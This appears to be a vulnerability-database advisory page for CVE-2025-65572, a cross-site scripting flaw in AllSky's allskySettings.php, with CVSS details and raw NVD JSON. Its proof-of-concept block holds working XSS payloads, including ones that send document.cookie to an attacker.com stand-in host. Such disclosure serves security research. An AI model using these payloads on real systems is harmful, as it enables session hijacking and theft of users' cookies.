Security Vulnerability Report
中文
CVE-2025-65572 CVSS 6.1 MEDIUM

CVE-2025-65572

Published: 2025-12-09 19:15:50
Last Modified: 2025-12-16 20:03:52
Source: [email protected]

Description

Cross Site Scripting (XSS) vulnerability in AllskyTeam AllSky v2024.12.06_06 allows remote attackers to execute arbitrary code via the (1) config, (2) filename, or (3) extratext parameter to allskySettings.php. When the page is reloaded or when user visits allskySettings.php, the showMessages() function in status_messages.php will print out the error messages and execute the script injected by the attacker.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:allskyteam:allsky:2024.12.06_06:*:*:*:*:*:*:* - VULNERABLE
AllskyTeam AllSky v2024.12.06_06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-65572 PoC - Stored XSS in AllSky allskySettings.php --> <!-- Inject via config parameter --> https://[target]/allskySettings.php?config=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E <!-- Inject via filename parameter --> https://[target]/allskySettings.php?filename=%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E <!-- Inject via extratext parameter --> https://[target]/allskySettings.php?extratext=%3Cscript%3Edocument.location=%27https://attacker.com/steal?c=%27+document.cookie%3C/script%3E <!-- Example HTML form for exploitation --> <form action="https://[target]/allskySettings.php" method="GET"> <input type="hidden" name="config" value='"><script>fetch("https://attacker.com/log?cookie="+document.cookie)</script>'> <input type="submit" value="Exploit"> </form>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65572", "sourceIdentifier": "[email protected]", "published": "2025-12-09T19:15:49.533", "lastModified": "2025-12-16T20:03:52.207", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting (XSS) vulnerability in AllskyTeam AllSky v2024.12.06_06 allows remote attackers to execute arbitrary code via the (1) config, (2) filename, or (3) extratext parameter to allskySettings.php. When the page is reloaded or when user visits allskySettings.php, the showMessages() function in status_messages.php will print out the error messages and execute the script injected by the attacker."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:allskyteam:allsky:2024.12.06_06:*:*:*:*:*:*:*", "matchCriteriaId": "E0704121-18E0-4B0F-9ACB-29812AC92F63"}]}]}], "references": [{"url": "https://gh0stmezh.wordpress.com/2025/12/04/cve-2025-65572/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/AllskyTeam/allsky", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/AllskyTeam/allsky/blob/master/html/includes/allskySettings.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/AllskyTeam/allsky/blob/master/html/includes/status_messages.php", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.